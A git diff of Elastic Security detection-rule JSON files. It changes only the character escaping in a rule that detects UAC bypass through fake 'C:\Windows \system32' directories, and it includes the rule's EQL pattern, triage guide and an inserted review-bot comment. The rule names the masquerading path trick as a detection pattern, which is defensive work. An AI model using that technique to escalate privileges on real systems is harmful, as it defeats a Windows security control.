[Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : (\"C:\\\\Windows \\\\system32\\\\*.exe\", \"C:\\\\Windows \\\\SysWOW64\\\\*.exe\")\n", "references": [ "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e" @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "290aca65-e94d-403b-ba0f-62f320e63f51", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_106.json b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_106.json index dcea0d72adc..2360d48acf1 100644 --- a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_106.json 
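Review bot: The new side of the `note` hunk differs from the old side only in `\u003e` becoming `>` (and, in the `setup` and `framework` hunks below it, `\u003c` → `<` and `\u0026` → `&`), so the multi-kilobyte rewritten line carries no semantic change — both spellings decode to the identical JSON string, and the value is still consumed as JSON and rendered as Markdown by Kibana, so dropping the HTML-safe escaping is harmless here. What the diff does do is touch already-released historical versions of this rule (`_105`, `_106` and `_107` are all rewritten the same way), which are normally frozen once shipped; if this comes from a serializer change rather than an intentional content edit, it is worth confirming that whatever compares or fingerprints these rule files works on the decoded JSON value rather than raw bytes, so these versions are not flagged as modified. The same observation applies to the `_106` hunks that end at the next `@@ -14,7 +14,7 @@` header; the `_107` hunk runs past the end of this view.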
+++ b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_106.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass Attempt via Windows Directory Masquerading", - "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : (\"C:\\\\Windows \\\\system32\\\\*.exe\", \"C:\\\\Windows \\\\SysWOW64\\\\*.exe\")\n", "references": [ "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e" @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "290aca65-e94d-403b-ba0f-62f320e63f51", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_107.json b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_107.json index dfa95e1462d..87f01acda88 100644 --- a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_107.json 
+++ b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_107.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass Attempt via Windows Directory Masquerading", - "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : (\"C:\\\\Windows \\\\system32\\\\*.exe\", \"C:\\\\Windows \\\\SysWOW64\\\\*.exe\")\n",
 "references": [
 "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e"
@@ -48,7 +48,7 @@
 ],
 "risk_score": 73,
 "rule_id": "290aca65-e94d-403b-ba0f-62f320e63f51",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_108.json b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_108.json
index 1a354dfa135..b4f9e5f744a 100644
--- a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_108.json 
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "UAC Bypass Attempt via Windows Directory Masquerading",
- "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
